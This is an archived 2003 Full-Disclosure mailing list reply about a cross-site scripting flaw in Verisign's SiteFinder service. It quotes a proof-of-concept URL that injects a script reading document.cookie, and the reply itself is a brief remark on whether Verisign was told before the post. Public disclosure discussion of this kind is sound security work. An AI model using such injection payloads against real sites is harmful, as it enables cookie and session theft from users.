[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-Disclosure] Global *.net XSS, thank you Verisign(TM)

To: full-disclosure@xxxxxxxxxxxxxxxx
Subject: Re: [Full-Disclosure] Global *.net XSS, thank you Verisign(TM)
From: "Paul Holman" <pablos@xxxxxxxxx>
Date: Tue, 16 Sep 2003 09:27:40 -0700 (PDT)

> On Mon, Sep 15, 2003 at 08:35:43PM -0700, xss_slut@xxxxxxxxxxxx wrote:
>> with a XSS bug, this works in IE:
>> Other less exciting versions of this XSS:
>> http://sitefinder.verisign.com/lpc?url=meow'><DEFANGED_script>alert(document.cookie)</script><'
>
>   Did you _at least_ tell Verisign about this before posting this?

Did Verisign tell us they were going to deploy this vulnerability before
doing so ad infinitum?

pablos.
-- 
Paul Holman
pablos@xxxxxxxxx

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

References:
- [Full-Disclosure] Global *.net XSS, thank you Verisign(TM)
  - From: xss_slut
- Re: [Full-Disclosure] Global *.net XSS, thank you Verisign(TM)
  - From: Jedi/Sector One

Prev by Date: Re: [Full-Disclosure] VBScript/JScript.Encode Decoder
Next by Date: Re: [Full-Disclosure] IE Object Type Validation Vulnerability Exploit
Previous by thread: Re: [Full-Disclosure] Global *.net XSS, thank you Verisign(TM)
Next by thread: Re: [Full-Disclosure] Global *.net XSS, thank you Verisign(TM)
Index(es):
- Date
- Thread